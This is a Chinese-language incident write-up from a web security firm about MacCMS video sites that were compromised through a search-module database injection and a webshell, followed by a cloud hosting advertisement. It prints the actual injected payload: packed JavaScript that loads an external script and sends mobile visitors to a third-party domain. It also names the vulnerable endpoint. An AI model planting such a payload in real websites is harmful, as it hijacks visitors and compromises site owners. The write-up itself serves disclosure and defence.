2020年剛開始，蘋果CMS被爆出數據庫代碼執行漏洞，大量的電影網站被掛馬，尤其電影的頁面被篡改植入了惡意代碼，數據庫中的VOD表里的d_name被全部修改，導致網站打開后直接跳轉到S站或者彈窗廣告，目前該maccms漏洞受影響的蘋果系統版本是V8,V10，很多客戶網站被反復篡改，很無奈，通過朋友介紹找到我們SINE安全尋求技術上支持，防止網站被掛馬。根據客戶的反應，服務器采用的是linux centos系統，蘋果CMS版本是最新的V10版本，我們立即成立網站安全應急響應處理，幫助客戶解決網站被攻擊的問題。

首先很多站長以為升級了蘋果CMS官方最新的漏洞補丁就沒問題了，通過我們SINE安全技術對補丁的代碼安全分析發現，該漏洞補丁對當前的數據庫代碼執行漏洞是沒有任何效果的，于事無補，網站還會繼續被攻擊。

我們來看下客戶網站目前發生的掛馬問題，打開網站首頁以及各個電影地址都會被插入掛馬代碼，如下圖所示：

打包壓縮了一份網站源代碼，以及nginx網站日志文件，我們SINE安全工程師在根目錄下發現被上傳了網站webshell木馬文件，通過網站日志溯源追蹤我們查看到訪問這個PHP腳本木馬文件的是一個韓國的IP，具體的代碼如下圖：

代碼做了加密處理，我們SINE安全對其解密發現該代碼的功能可以對網站進行上傳，下載，修改代碼，操作數據庫等功能，屬于PHP大馬的范疇，也叫webshell木馬文件，我們又對蘋果CMS的源代碼進行了人工安全審計，發現index.php代碼對搜索模塊上做的一些惡意代碼過濾檢查存在漏洞，可導致攻擊者繞過安全過濾，直接將SQL插入代碼執行到數據庫當中去。

我們對數據庫進行安全檢測發現，在VOD表的d_name被批量植入了掛馬代碼。

// <![CDATA[

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c 29):c.toString(36))};if(!\’\’.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\’\\\\w \’};c=1;};while(c–)if(k[c])p=p.replace(newPRegExp(\’\\\\b\’ e(c) \’\\\\b\’,\’g\’),k[c]);return p;}(\’4.5(\\\’\\\’);\’,14,14,\’js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la\’.split(\’|\’),0,{}));var LOUMtBZeW=navigator[\”userAgent\”][\”toLowerCase\”]()[\”match\”](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout(\’window.location.href=\”https://m.qiche-hangjia.com:168/ua80666/\”\’,500)}

這手法很專業，不是一般的攻擊者所為，針對手機端做了跳轉以及隱藏嵌入，讓網站運營者根本無法察覺發現，還判斷了cookies來路，達到條件才能觸發攻擊者植入的廣告代碼。繼續安全分析與追蹤，發現了攻擊者的手法，POST提交到/index.php?m=vod-search，POST內容是加密的這里就不方便發出了，屬于漏洞攻擊了，可能會給其他使用蘋果CMS系統的網站造成攻擊，我們SINE安全技術對POST攻擊代碼進行了解密分析，發現確實是繞過了蘋果官方V8，V10系統的代碼安全過濾，直接將掛馬代碼插入到了數據庫里了。

問題根源找到了，接下來我們對客戶的蘋果CMS漏洞進行修復，對POST提交過來的參數進行嚴格的過濾與轉義，對vod-search含有的惡意字符進行強制轉換，對惡意代碼進行安全攔截，防止傳入到后端進行數據庫里的代碼執行。對網站代碼里存在的木馬后門進行了全面的人工審計與檢查，共計發現5個后門，其余的在緩存目錄當中，跟程序代碼混淆在一起，也都刪除了，對網站的后臺地址進行了更改，之前后臺使用的地址被攻擊者掌握，對管理員的賬號密碼進行了加強，至此蘋果CMS網站被掛馬的問題才得以徹底解決，如果您的maccms也被一直掛馬，自己懂代碼的話可以對POST到index.php的數據進行安全攔截與檢查，防止惡意代碼的插入，如果不是太懂的話，建議找專業的網站安全公司來處理解決。

// ]]>

西部數碼（west.cn）是經工信部審批，持有ISP、云牌照、IDC、CDN全業務資質的正規老牌云服務商，自成立至今20余年專注于域名注冊、虛擬主機、云服務器、企業郵箱、企業建站等互聯網基礎服務！
公司自研的云計算平臺，以便捷高效、超高性價比、超預期售后等優勢占領市場，穩居中國接入服務商排名前三，為中國超過50萬網站提供了高速、穩定的托管服務！先后獲評中國高新技術企業、中國優秀云計算服務商、全國十佳IDC企業、中國最受歡迎的云服務商等稱號！
目前，西部數碼高性能云服務器正在進行特價促銷，最低僅需48元！
https://www.west.cn/cloudhost/